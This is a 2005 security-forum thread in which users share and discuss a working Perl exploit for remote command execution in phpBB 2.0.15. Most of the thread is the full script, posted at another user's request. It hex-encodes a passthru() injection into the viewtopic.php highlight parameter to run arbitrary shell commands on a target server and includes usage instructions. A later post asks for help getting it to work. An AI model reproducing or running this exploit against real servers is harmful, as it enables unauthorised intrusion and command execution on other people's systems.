|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 142
Members: 0
Total: 142
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Working phpBB 2.0.15 perl exploit |
|
Posted: Thu Jun 30, 2005 5:27 pm |
|
|
pLuToNiUm |
Beginner |
|
|
Joined: Jun 30, 2005 |
Posts: 1 |
|
|
|
|
|
|
|
|
|
|
|
Posted: Thu Jun 30, 2005 5:40 pm |
|
|
shai-tan |
Valuable expert |
|
|
Joined: Feb 22, 2005 |
Posts: 477 |
|
|
|
|
|
|
|
Good work |
|
_________________ Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
Posted: Wed Jul 06, 2005 1:48 pm |
|
|
petitmaitreblanc |
Regular user |
|
|
Joined: Jul 05, 2005 |
Posts: 18 |
|
|
|
|
|
|
|
the link seemed to be down , can you put the code here plz ? |
|
|
|
|
|
|
|
|
Posted: Wed Jul 06, 2005 9:02 pm |
|
|
iammojo |
Regular user |
|
|
Joined: Mar 20, 2005 |
Posts: 18 |
|
|
|
|
|
|
|
Code: | #!/usr/bin/perl
## phpBB 2.0.15 remote command execution exploit
## by pLuToNiUm , wmsecurity@nm.ru 29/6/05
## =-= =-= =-= =-=
## the bug was discovered on 23/06/05 by Ron van Daal
## greeting to RusH for the previous eXploit.
use IO::Socket;
if (@ARGV < 4)
{
print q([+++++++++++++++++++++++++++++++++++++++++++++++++++++++]
how to use:
2015.pl www.phpbb.com /forum/ 1337 "ls -al"
parameters:
[URL] - server URL e.g. www.phpbb.com
[DIR] - directory where phpBB installed e.g. /phpBB/ or /
[NUM] - number of existing topic
[CMD] - command for execute e.g. ls
[]+++++++++++++++++++++++++++++++++++++++++++++++++++++[]
);
exit;
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$topic = $ARGV[2];
$cmd = $ARGV[3];
$serv =~ s/(http:\/\/)//eg;
print "=== COMMAND: =[ $cmd ]= ===\r\n";
print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n";
$cmd=~ s/(.*);$/$1/eg;
$cmd=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$topic=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$path = $dir;
$path .= 'viewtopic.php?t=';
$path .= $topic;
$path .= '&hack=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20';
$path .= $cmd;
$path .= '%3B%20%65%63%68%6F%20%5F%45%4E%44%5F';
$path .= '&highlight=%27%2e%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%68%61%63%6b%5d%29%2e%27';
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] CONNECTION FAILED\r\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
$on = 0;
while ($answer = <$socket>)
{
if ($answer =~ /^_END_/) { print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n"; exit(); }
if ($on == 1) { print " $answer"; }
if ($answer =~ /^_START_/) { $on = 1; }
}
print "[-] EXPLOIT DIDN'T WORK\r\n";
print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n";
|
|
|
|
|
|
|
|
|
|
Posted: Thu Jul 07, 2005 1:56 pm |
|
|
subzero |
Valuable expert |
|
|
Joined: Mar 16, 2005 |
Posts: 42 |
|
|
|
|
|
|
|
|
Last edited by subzero on Thu Jul 07, 2005 2:30 pm; edited 1 time in total |
|
|
|
Posted: Thu Jul 07, 2005 2:25 pm |
|
|
petitmaitreblanc |
Regular user |
|
|
Joined: Jul 05, 2005 |
Posts: 18 |
|
|
|
|
|
|
|
sorry , but for this exploit works , they re some conditions ?
coz for me , it works , but , when I put an "ls" command , I have no answer , nothing , when I try with some other command , one time i am disconnected , one time same problem => no error message , but no result too .
So , I think (It's just what think a fucking n00b as me ;p) the apache server and php must have some option , as the system command's support , no ? |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|